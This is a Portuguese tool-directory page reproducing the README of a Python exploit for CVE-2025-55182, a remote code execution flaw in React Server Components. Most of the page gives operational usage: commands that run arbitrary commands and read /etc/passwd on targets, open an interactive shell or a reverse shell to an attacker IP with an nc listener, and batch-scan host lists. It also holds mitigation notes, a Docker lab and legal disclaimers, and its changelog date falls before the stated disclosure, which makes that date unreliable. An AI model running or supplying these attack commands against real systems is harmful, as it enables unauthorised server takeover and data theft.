Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182_liyon — Exploit baseado em Python para CVE-2025-55182 (RCE em React Server Components) com shell interativo, reverse shell, varredura em lote e ambiente vulnerável baseado em Docker para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming
Ferramenta de Acesso Remoto
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

Exploit baseado em Python para CVE-2025-55182 (RCE em React Server Components) com shell interativo, reverse shell, varredura em lote e ambiente vulnerável baseado em Docker para testes de segurança autorizados.

Ver Repositório
3há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 - RCE em React Server Components

⚠️ Aviso Legal: Esta ferramenta destina-se apenas a pesquisa de segurança, testes de penetração autorizados e fins educacionais. Usar esta ferramenta contra sistemas alvo sem permissão explícita é ilegal e antiético.

📋 Visão Geral

CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código (RCE) nos React Server Components (RSC), permitindo que um atacante não autenticado execute código arbitrário no servidor através de desserialização maliciosa de JavaScript.

🎯 Detalhes da Vulnerabilidade

PropriedadeValor
ID CVECVE-2025-55182
Pontuação CVSS9.8 (Crítico)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UtilizadorNenhuma
ImpactoAlto (Confidencialidade, Integridade, Disponibilidade)
Componente AfetadoReact Server Components (RSC)
Versões AfetadasReact 18.x - 19.x (builds específicas)
Data de Divulgação3 de Dezembro de 2025
Alias CVEReact2Shell

🔍 Detalhes Técnicos

Causa Raiz: O React Server Components desserializa incorretamente objetos JavaScript fornecidos pelo utilizador ao processar payloads RSC, permitindo que um atacante injete código malicioso executado no servidor.

Vetor de Ataque: Payloads RSC maliciosos em requisições HTTP Impacto: Execução remota de código sem autenticação, tomada de servidor, fuga de dados

🚀 Funcionalidades

  • ✅ Ferramenta de exploração em Python num único ficheiro com shell interativa
  • ✅ Deteção automatizada de vulnerabilidades
  • ✅ Scan em lote com suporte a multithreading
  • ✅ Ambiente React vulnerável baseado em Docker
  • ✅ Suporte a múltiplos tipos de payload
  • ✅ Logging detalhado e tratamento de erros
  • ✅ Estabelecimento de reverse shell
  • ✅ Codificação de payload em Base64

📦 Instalação

root@kitploit:~
# Clonar o repositório
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# Instalar dependências
pip install -r requirements.txt

🎯 Utilização

Início Rápido

root@kitploit:~
# Instalar dependências
pip install requests

# Executar comando no alvo vulnerável
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# Modo shell interativo
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

Opções Avançadas

root@kitploit:~
# Comando personalizado
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# Estabelecer reverse shell com IP/porta personalizados
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# Scan em lote
python exploit/batch_scanner.py -f targets.txt

# Modo verboso
python exploit/cve_2025_55182.py -u http://target.com -v

# User-Agent personalizado
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ Configuração do Ambiente de Treino

Usando Docker (Recomendado)

root@kitploit:~
cd target
docker-compose up -d

Configuração Manual

root@kitploit:~
cd target
npm install
npm run dev

Aceder à aplicação vulnerável: http://localhost:3000

📊 Cenários de Ataque

Cenário 1: Execução de Comandos

Executar um único comando no servidor vulnerável:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

Saída Esperada:

root@kitploit:~
[+] Deteção de vulnerabilidade bem-sucedida: RCE em React Server Components
[+] A executar comando: id
[+] Resposta:
uid=0(root) gid=0(root) groups=0(root)

Cenário 2: Shell Interativa

Obter uma shell interativa no servidor vulnerável:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

Funcionalidades:

  • Autocompletação com Tab
  • Histórico de comandos
  • Múltiplas sessões de shell
  • Upload/Download de ficheiros

Cenário 3: Reverse Shell

Estabelecer uma conexão reverse shell:

root@kitploit:~
# Na máquina do atacante
nc -lvnp 4444

# Executar a ferramenta de exploração
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

Cenário 4: Scan em Lote

Varrer múltiplos alvos à procura da vulnerabilidade:

root@kitploit:~
# Criar ficheiro de alvos
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# Executar o scanner em lote
python exploit/batch_scanner.py -f targets.txt

🛡️ Mitigação e Defesa

Ações Imediatas

  1. Atualizar o React

    root@kitploit:~
    npm install react@latest
    # Atualizar para a versão corrigida
    
  2. Bloquear Requisições RSC

    root@kitploit:~
    // Desativar temporariamente RSC
    const config = {
      enableRSC: false
    }
    
  3. Regras WAF

    • Bloquear requisições contendo padrões RSC
    • Monitorizar payloads JavaScript suspeitos
    • Aplicar rate limiting nos endpoints RSC

Correções de Longo Prazo

  • Implementar validação de entrada para payloads RSC
  • Utilizar execução de JavaScript em ambiente isolado (sandbox)
  • Realizar auditorias de segurança regulares
  • Monitorizar acessos RSC não autorizados

📚 Documentação

  • Análise da Vulnerabilidade - Análise técnica aprofundada
  • Guia de Utilização - Instruções completas de uso
  • Defesa e Correção - Reforço de segurança

🧪 Testes

Testes Manuais

root@kitploit:~
# Montar ambiente vulnerável
cd target && docker-compose up -d

# Testar a vulnerabilidade
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

Testes Automatizados

root@kitploit:~
# Executar o conjunto de testes
python tests/test_exploit.py

🔬 Referências de Pesquisa

  • Entrada NVD para CVE-2025-55182
  • Aviso de Segurança do React
  • Blog de Pesquisa Wiz
  • Análise do Project Zero

📝 Registo de Alterações

v1.0.0 (2025-04-02)

  • Lançamento inicial
  • Exploração RCE para alvo único
  • Modo shell interativo
  • Suporte a reverse shell
  • Scan em lote
  • Ambiente vulnerável Docker
  • Documentação abrangente

🎓 Fins Educacionais

Esta ferramenta demonstra:

  • Como funcionam as vulnerabilidades RCE no React
  • Práticas corretas de desenvolvimento de exploração
  • Metodologias de avaliação de segurança
  • Princípios de hacking ético

👥 Contribuidores

  • Investigador de Segurança - Implementação inicial

📄 Licença

Este projeto está licenciado sob a licença MIT - veja o ficheiro LICENSE para mais detalhes.

⚠️ Declaração Legal e Ética

Importante: Esta ferramenta destina-se exclusivamente a fins educacionais e de teste de segurança autorizado.

Requisitos Legais

  • Utilize apenas em sistemas que possui ou para os quais obteve autorização explícita para testar
  • Cumpra todas as leis e regulamentos aplicáveis
  • Reporte vulnerabilidades ao fornecedor de forma responsável
  • Siga as diretrizes de divulgação responsável

Comportamentos Proibidos

  • Acesso não autorizado a sistemas informáticos
  • Direcionar sistemas sem permissão
  • Utilizar a vulnerabilidade para fins maliciosos
  • Divulgar ou destruir dados

Consequências Legais

  • Acusações criminais por acesso não autorizado
  • Responsabilidade civil por danos
  • Potencial pena de prisão
  • Consequências profissionais

Ao utilizar esta ferramenta, concorda em:

  • Cumprir todas as leis locais e internacionais
  • Utilizá-la apenas para testes de segurança autorizados
  • Reportar responsavelmente as vulnerabilidades encontradas
  • Não a utilizar para atividades maliciosas ou ilegais

📞 Reportar Vulnerabilidades

Se encontrar esta vulnerabilidade em sistemas de produção:

  1. Reporte ao fornecedor

    • Equipa React: [email protected]
    • Siga a divulgação responsável
  2. Atribuição CVE

    • Submeta ao NIST NVD
    • Siga o cronograma de divulgação
  3. Comunidade de Segurança

    • Partilhe descobertas (após correção)
    • Contribua para o conhecimento de segurança

Lembre-se: A pesquisa de segurança deve ser sempre ética e legal. Use as suas competências para tornar a Internet mais segura! 🛡️

Baixar ferramenta